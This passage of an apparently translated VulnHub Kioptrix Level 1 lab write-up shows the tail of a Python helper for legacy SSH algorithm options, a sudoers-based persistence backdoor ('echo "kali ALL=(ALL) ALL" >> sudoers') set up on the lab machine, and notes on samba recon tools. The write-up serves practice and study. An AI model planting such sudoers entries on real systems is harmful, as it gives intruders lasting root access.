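# Blowfish and CAST are deliberately absent so they are never selected.
PREFERENCE = {
    "KexAlgorithms": ["diffie-hellman-group-exchange-sha1", "diffie-hellman-group1-sha1"],
    "Ciphers": ["aes256-cbc", "aes192-cbc", "aes128-cbc", "3des-cbc"],
}


def parse_negotiation_error(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (ssh_config keyword, algorithms the server offered), or None."""
    m = _ERR_RE.search(line)
    if not m or m.group(1) not in OPTION_FOR:
        return None
    return OPTION_FOR[m.group(1)], m.group(2).split(",")


def pick_algorithm(keyword: str, offered: List[str]) -> str:
    """Strongest offered algorithm by PREFERENCE; fall back to the server's first."""
    for name in PREFERENCE.get(keyword, []):
        if name in offered:
            return name
    return offered[0]


def client_options(errors: List[str]) -> List[str]:
    """Build the -o arguments that let a current client talk to the legacy server.

    The '+' prefix appends to the client's default list instead of replacing it,
    so only this connection is widened and nothing stronger is dropped.
    """
    opts: Dict[str, str] = {}
    for line in errors:
        parsed = parse_negotiation_error(line)
        if parsed:
            keyword, offered = parsed
            opts[keyword] = pick_algorithm(keyword, offered)
    return [f"-o{k}=+{v}" for k, v in opts.items()]


if __name__ == "__main__":
    print("ssh", *client_options(ERRORS), "kali@192.168.3.29")
```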

 

 

 

Now, in the separate session where I'm in as root,

I change the /etc/sudoers settings:

cd /etc

echo "kali ALL=(ALL) ALL" >> sudoers

With this, escalating to root from an SSH login is possible any time.

The backdoor is complete.

[kali@kioptrix /]$
[kali@kioptrix /]$ sudo su
unknown terminal "xterm-256color"
unknown terminal "xterm-256color"
[root@kioptrix /]#

※I plan to study the encryption side in the following article:

qiita.com

Checking the samba service

Since I could log in over SSH without trouble,

I check the services, samba included.

[root@kioptrix /]# service --status-all
anacron dead but subsys locked
apmd (pid 700) is running...
arpwatch is stopped
atd (pid 915) is running...
Configured Mount Points:
------------------------

Active Mount Points:
--------------------
Broadcom BCM5820 init script
Copyright (c) 2001 Broadcom Corporation
usage: bcm5820 [start|stop|restart|condrestart]
crond (pid 867) is running...
gpm (pid 849) is running...
httpd (pid 1333 1332 1331 1330 1328 1326 925) is running...
identd is stopped
ipchains: Incompatible with this kernel
Table: filter
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Table: nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Table: mangle
Chain PREROUTING (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
No status available for this package
lpd is stopped
Configured devices:
lo eth0
Currently active devices:
eth0 lo
rpc.mountd is stopped
nfsd is stopped
rpc.rquotad is stopped
rpc.statd (pid 588) is running...
nscd is stopped
portmap (pid 560) is running...
postmaster is stopped
The random data source exists
rpc.rstatd is stopped
rpc.rusersd is stopped
rpc.rwalld is stopped
rwhod is stopped
sendmail (pid 830) is running...
smbd (pid 923) is running...
nmbd (pid 921) is running...
snmpd is stopped
squid is stopped
FATAL: Could not determine fully qualified hostname. Please set 'visible_hostname'

Squid Cache (Version 2.4.STABLE1): Terminated abnormally.
CPU Usage: 0.010 seconds = 0.000 user + 0.010 sys
Maximum Resident Size: 0 KB
Page faults with physical i/o: 304
sshd (pid 6243 1113) is running...
syslogd (pid 535) is running...
klogd (pid 540) is running...
tux is stopped
xfs is stopped
xinetd (pid 789) is running...
ypbind is stopped
rpc.yppasswdd is stopped
ypserv is stopped
ypxfrd is stopped

smbd... it's running, huh...

[root@kioptrix /]# service smb status
smbd (pid 923) is running...
nmbd (pid 921) is running...
[root@kioptrix /]# ps aux | grep 923
root 923 0.0 1.9 3256 1192 ? S 03:11 0:00 smbd
[root@kioptrix /]# service smb restart
Shutting down SMB services: [ OK ]
Shutting down NMB services: [ OK ]
Starting SMB services: [ OK ]
Starting NMB services: [ OK ]
[root@kioptrix /]# ps aux | grep 923
[root@kioptrix /]# service smb status
smbd (pid 7778) is running...
nmbd (pid 7783) is running...
[root@kioptrix /]#

I tried a restart just to see, but no good...

Let me take another look at the enum4linux error.

...
=====================================
| Session Check on 192.168.3.29 |
=====================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

...

Ah, this just means the username/password combination is wrong...

Huh? But in some writeups it works just fine; I wonder why?

Well, anyway,

I've finished building the backdoor, so I'll call this done.

Next time I might run an update campaign to get rid of the vulnerabilities.

That's all!

Kioptrix1: tools used during reconnaissance (dirbuster, nbtscan, rpcclient, enum4linux)

Looking at various people's writeups and studying.

References

The writeups newly used as references are the following:

https://blog.bladeism.com/kioptrix-level-1/

https://blog.roskyfrosky.com/vulnhub/2017/04/01/Kioptrix1.0-vulnhub.html

Commands used during the intrusion:

% dirbuster http://192.168.3.29/

% nbtscan 192.168.3.29

% rpcclient -U "" 192.168.3.29

% enum4linux 192.168.3.29

Let me check how each one works.

dirbuster

Specify a wordlist and check for directories and valid pages.

It feels much like dirb to use, but since it opens a window, maybe it's easier to leave running in the background?

I've been using dirb until now, and there's no particular reason to switch to this tool...

nbtscan

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ nbtscan 192.168.3.29
Doing NBT name scan for addresses from 192.168.3.29

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.3.29 KIOPTRIX <server> KIOPTRIX 00:00:00:00:00:00

rpcclient

A tool for using the communication protocol called RPC.

Apparently one piece of the samba system.

http://www.samba.gr.jp/project/translation/3.5/htmldocs/manpages-3/rpcclient.1.html

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ rpcclient -U "" 192.168.3.29
Enter WORKGROUP\'s password:
d
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT

As also shown below, it seems samba on my VM is in a bad way...

enum4linux

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ enum4linux 192.168.3.29
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Mar 29 01:04:35 2020

==========================
| Target Information |
==========================
Target ........... 192.168.3.29
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


====================================================
| Enumerating Workgroup/Domain on 192.168.3.29 |
====================================================
[+] Got domain/workgroup name: MYGROUP

============================================
| Nbtstat Information for 192.168.3.29 |
============================================
Looking up status of 192.168.3.29
KIOPTRIX <00> - B <ACTIVE> Workstation Service
KIOPTRIX <03> - B <ACTIVE> Messenger Service
KIOPTRIX <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MYGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MYGROUP <1d> - B <ACTIVE> Master Browser
MYGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================
| Session Check on 192.168.3.29 |
=====================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

In my environment the Session Check part errors out, but

normally you can see beyond that and confirm that the samba version is 2.2.1a, apparently.

Hmm, what's different???

By the way, I also checked the second reference writeup, but

the smbclient connection times out.

Probably the samba client isn't working properly??

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1$ sudo smbclient -L 192.168.3.29
protocol negotiation failed: NT_STATUS_IO_TIMEOUT

So even if I attack the 2.2.1a vulnerability,

it probably wouldn't get through, I think.

That's all.